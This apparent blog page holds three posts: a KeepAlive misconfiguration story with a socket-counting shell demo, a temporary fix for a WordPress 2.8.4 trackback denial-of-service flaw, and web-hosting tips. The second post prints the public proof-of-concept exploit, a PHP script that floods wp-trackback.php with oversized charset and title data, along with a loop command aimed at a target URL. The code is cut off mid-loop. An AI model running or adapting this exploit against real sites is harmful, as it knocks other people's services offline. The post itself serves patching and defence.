Apache Web Server Over Optimization: A Cautionary Tale

When it comes to squeezing every ounce of performance from an Apache web server, it is easy to make changes that have dire consequences for your sites. Sometimes the server load goes up right away, so it is easy to tell you are headed in the wrong direction. But some modifications make a real mess of things in a much more subtle way.

The Problem:

Load on my web server went up when several of my competitors' sites got booted from the top 10 of Google, which left my site as the lone survivor for a very competitive keyword. That day my poor little 2.8 dual Xeon with 2GB of RAM web server went from an average load of 2.7 to well over 80, with spikes in the 100+ range.

How I “Fixed” It:

I went in and started messing with the httpd.conf file. I changed just about everything under the sun and then thought it would be smart to turn KeepAlive off. Now I could free up all those idle connections hogging memory until they time out. It was supposed to be a win-win: my visitors would get a better experience and load would go down. Or so the theory goes…

Why This Went Horribly Wrong:

If you run web sites with lots of pictures, each photo fetched from the server opens a new TCP connection once KeepAlive is off, instead of reusing the connection that fetched the page. So if you have a page with 60 images, you can see how quickly the number of connections each visitor makes adds up. If they use one of those web caching programs/plugins that follow links and download pages automatically in order to speed up dial-up browsing, it gets even worse.

As part of my server hardening I run (D)DoS Deflate, a great DDoS mitigation script written by the good folks at Medialayer. Since KeepAlive was off, these visitors were making hundreds of completely legitimate connections to the web server. (D)DoS Deflate would see this and then ban their IP. I can't blame the script; it was doing exactly what I told it to do. The effect was that thousands of visitors and potential customers were getting their IPs banned from my server. Yeah, ouch!
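The interaction above, as an added example that is not part of the original post or of (D)DoS Deflate itself: it reproduces the per-source-IP socket count that a netstat-based banner performs, on constructed connection lines, and shows why one legitimate visitor loading a 60-image page with KeepAlive Off looks like an attacker. Assumptions: the banner counts the foreign-address column of netstat -ntu in every TCP state (the classic awk/cut/sort/uniq pipeline) and bans any IP above a fixed limit; the limit of 50 and every address below are made up for the demonstration. The TIME_WAIT detail is the key point: with KeepAlive Off, Apache closes each connection after a single response, so the server keeps a TIME_WAIT socket per image for about a minute even though the browser only has a handful of connections open at any instant.

```shell
#!/bin/sh
# Added example (not from the original post or from (D)DoS Deflate itself):
# reproduces the per-source-IP socket count a netstat-based banner performs,
# on constructed data, to show why KeepAlive Off trips it.
#
# Assumptions: the banner reads column 5 of `netstat -ntu` (foreign address)
# in every TCP state and bans any IP above a fixed limit. The server address
# 198.51.100.10 and all visitor addresses are documentation-range placeholders.

# Constructed netstat -ntu style output: one legitimate browser on 203.0.113.7
# that just loaded a 60-image page with KeepAlive Off. The server closed each
# connection after one response, leaving one TIME_WAIT socket per image, plus
# one connection still open. Two other visitors have a few sockets each.
SAMPLE_NETSTAT="$(
  i=0
  while [ "$i" -lt 60 ]; do
    echo "tcp        0      0 198.51.100.10:80   203.0.113.7:$((40000 + i))   TIME_WAIT"
    i=$((i + 1))
  done
  echo "tcp        0      0 198.51.100.10:80   203.0.113.7:41000   ESTABLISHED"
  echo "tcp        0      0 198.51.100.10:80   192.0.2.44:51234    ESTABLISHED"
  echo "tcp        0      0 198.51.100.10:80   192.0.2.44:51235    ESTABLISHED"
  echo "tcp        0      0 198.51.100.10:80   192.0.2.99:60001    TIME_WAIT"
)"

# count_per_ip: read netstat lines on stdin, print "<count> <ip>" per remote
# address, highest first. Every TCP state is counted, TIME_WAIT included.
count_per_ip() {
  awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# over_limit LIMIT: read netstat lines on stdin, print the IPs a banner with
# that limit would block (strictly more than LIMIT sockets).
over_limit() {
  count_per_ip | awk -v limit="$1" '$1 > limit {print $2}'
}

# established_over_limit LIMIT: same check, but counting only ESTABLISHED
# sockets, which ignores the TIME_WAIT backlog a KeepAlive Off visitor leaves.
established_over_limit() {
  awk '$6 == "ESTABLISHED"' | over_limit "$1"
}

# Demo when run directly: the 60-image visitor shows 61 sockets and is the
# only IP banned at limit 50; counting ESTABLISHED only bans nobody.
printf '%s\n' "$SAMPLE_NETSTAT" | count_per_ip
echo "Banned with limit 50 (all states):"
printf '%s\n' "$SAMPLE_NETSTAT" | over_limit 50
echo "Banned with limit 50 (ESTABLISHED only):"
printf '%s\n' "$SAMPLE_NETSTAT" | established_over_limit 50
```

Turning KeepAlive back on (KeepAlive On, with MaxKeepAliveRequests and KeepAliveTimeout tuned to taste) is the fix the post settles on; the established_over_limit variant shows the other knob a practitioner can compare against, counting only open connections instead of every socket. The cut -d: -f1 split assumes IPv4 foreign addresses; IPv6 addresses contain colons and need a different split.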

Fixing the “Fixed”:

In the first thirty minutes after the Apache reconfiguration I received easily 100 banned-IP notifications. I thought that my server was getting DDoS'ed and was comforted by my superior server hardening and Apache tweaking skills. Then in the next half hour I got another 100. I knew something was up. Then I got an e-mail from a friend of mine alerting me that one of my sites was unavailable. That was odd, since I was literally writing a post in WordPress at the time. Taking a look at the log, sure enough, he had been banned. Luckily, I made the connection between (D)DoS Deflate and KeepAlive and quickly turned KeepAlive back on. Everything was right with the world again.

Lessons Learned:

  1. If you run sites with lots of photos on individual pages, do not turn KeepAlive off if you are running (D)DoS Deflate.
  2. Always remember that Apache is part of your server ecosystem. Mess one piece up, mess them all up. Your Apache ninja skills are never good enough to prevent all screw-ups, so be careful.
  3. It’s great when your competitors lose their ranking leaving you in the top spot in Google for competitive keywords. :)

P.S. No actual clients were harmed. This event happened on a server reserved for my own personal affiliate work.

Temporary Fix for WordPress 2.8.4 Exploit

This exploit has been patched in the new 2.8.5 version of WordPress. Download it at: http://wordpress.org/download/

If you are running WordPress 2.8.4, there is a publicly circulating exploit that lets anyone DoS your site: it POSTs a very large charset value to wp-trackback.php (see the proof of concept below) and exhausts the server's resources.

Here is a TEMPORARY fix for any site that has not yet been updated to 2.8.5:

Copy this code into your theme's functions.php file. If there isn't a file called functions.php, create one.


<?php
// Temporary mitigation: bail out of any POST that carries an oversized
// charset value, which is what the trackback proof of concept below sends
// (a charset list of roughly 140 KB). The middle of this function was lost
// when the page was copied; the two outer conditions are reconstructed from
// the surviving fragment and the exploit, the 50-character limit is original.
function ft_stop_trackback_dos_attacks() {
        if ( isset( $_SERVER['REQUEST_METHOD'] ) && $_SERVER['REQUEST_METHOD'] === 'POST' ) {
                if ( isset( $_POST['charset'] ) ) {
                        if ( strlen( $_POST['charset'] ) > 50 ) {  die; }
                }
        }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

Here is the proof of concept code (i.e. the exploit). DO NOT put this in your functions.php:

<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * security@wordpress.org contacted and get a response,
 * but no solution available.
 * 
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org 
 * 
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 * 
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n 

5 Tips on How to Select a Good Web Host

Whether you run a large ecommerce web site or are looking for a place to set up a blog, everyone with an Internet presence uses web hosting. A reliable web host is more than just a computer where you dump your stuff. They act as your silent partner in the web world. If a web site is a virtual store, then a web host is the ground underneath it.

There are several types of webhosting you can use such as:

  • Shared hosts
  • Virtual Private Servers (VPS)
  • Dedicated Servers

Regardless of the type of hosting you need, keep these 5 tips in mind when selecting your next web host.

Be Wary of Any Host That Offers Unlimited Anything

The majority of web sites will use less than 100 MB of storage space and might use a GB of bandwidth a month. Web hosts know this and advertise their hosting plans as "Unlimited" bandwidth, hard drive space, or both.

They can do this because for every 100 customers that use virtually no resources, there will be one that actually has a popular, resource-intensive web site. So a balance is created where the popular site uses more server resources while most of the sites use a lot less.

Here is the hidden "gotcha": if you are the owner of that popular site, it is very common for the web host to demand that you upgrade to a more expensive account or even a dedicated server. If you read the TOS carefully, you'll see they can do this at any time. This is about as close to bait and switch as you can get in the hosting world.

The bottom line is that unlimited really isn't unlimited. It's more like: unlimited until you hit an arbitrary, undisclosed usage level, then you have to pony up some more cash or get the heck off the server.

Never Pre-Pay for Multiple Months in Advance

Many hosts will offer a discount if you sign up for 3, 6, or 12 months up front. In exchange for paying one big lump sum, they provide a pretty significant discount. This is a bad idea for three reasons:

  • If the web host's service declines over time and you want to switch to a new host, you can kiss the unused portion of the pre-paid amount goodbye. This also applies to web hosts that go out of business. When they fold there is very little chance of getting your money back.
  • If your site grows and the web host demands that you upgrade, the pre-paid balance usually applies to the new rate, but you can't get a discount on the new rate without committing to even more time.
  • If the host decides to kick you off their servers due to a TOS violation, you forfeit the unused portion. For example, a client of mine pre-paid HostICan for 12 months of service. The service was fine for 3 months, and then when his gallery script started using too much processor time they killed the account and refused to refund the pre-paid portion. The amount was too small to take to small claims court. So not only was his site removed without warning, costing him sales, but he also had to go through the pain of manually moving his site to a new host.

Guaranteed Uptime is B.S.

Sometime in the early days of the Internet, a web host got the bright idea to advertise 99.9% uptime. While this looks good in ad copy, it's a hollow promise that 99.9% of them cannot back up with data. 99.9% uptime equates to about 44 minutes of downtime per month, or 8 hours and 45 minutes a year. This is a pretty easy hurdle to clear assuming nothing out of the ordinary happens, like a DDoS attack or a hard drive failure.

Unless you have multiple redundant web servers all over the world, there is going to be some downtime. It's not possible to predict how much downtime a server will have, and if someone could accurately guess, they would be better off picking Kentucky Derby winners than being a server administrator.

Overall, don’t factor the uptime guarantee into your hosting choice.  It’s complete B.S.

24/7 Technical Support isn’t Always 24/7

A lot of hosts promise this, but few can actually deliver. Unfortunately, web server problems do not always happen during regular business hours. Your web site can go down at any time, and having support staff available is the difference between being down a couple of minutes and being down for hours. Your web host must have people available 24/7 to handle any problems that may arise.

You can easily test the support capabilities of your host and their response time. All you need to do is submit a support ticket at an off time, like after midnight on a weekend. You should expect more than just an acknowledgement of receipt: an actual answer or solution to your problem. If you don't get a resolution, or at least an acknowledgement that they are working on the problem, within an hour, that should be a red flag. If they have a support phone number, give that a ring as well. Again, a person who can actually solve your problem should be available, not just an operator who tells you they are working on it. One caveat is that small problems will often be prioritized lower than a critical problem like a server going down, and during off-peak times fewer staff will be available, so a small problem will have a longer delay than normal.

Doing Your Homework Can Save you From a Major Headache

There are hundreds of web hosts out there. They run the gamut from excellent to just plain bad. Price is not a reliable indicator of quality. Since they all offer a slightly different mix of hard drive space, bandwidth, control panels, etc., it is difficult to compare them accurately to each other. By doing some basic research you can quickly weed out the poor performers.

I use message boards like Web Hosting Talk to research potential hosting providers. Using their search feature, you can find all the posts, good and bad, that discuss your potential future host. Make sure to read through both the positive and negative reviews. Not all negative reviews are based on something the host can control, and not all positive reviews are unbiased. I've seen more than one suspiciously glowing review of a host.

Of course you can also use Google to find out more info.  Just do a search for:

  • WebHostName problems
  • WebHostName issues
  • WebHostName downtime
  • WebHostName review

Keep in mind to take any recommendation with a grain of salt. Any review will be biased, but at least you can quickly weed out the losers and separate the popular hosts from the rest of the pack.

Overall, the best advice I can give you is when you do find a good web host that has good support, features, and uptime, stick with them.  Chasing after a dollar or two savings per month is not worth the hassle or potential down time.

Happy web host shopping and make sure to check back often.  I’ll be releasing a comprehensive guide to selecting the right type of web hosting for your site in the next couple weeks.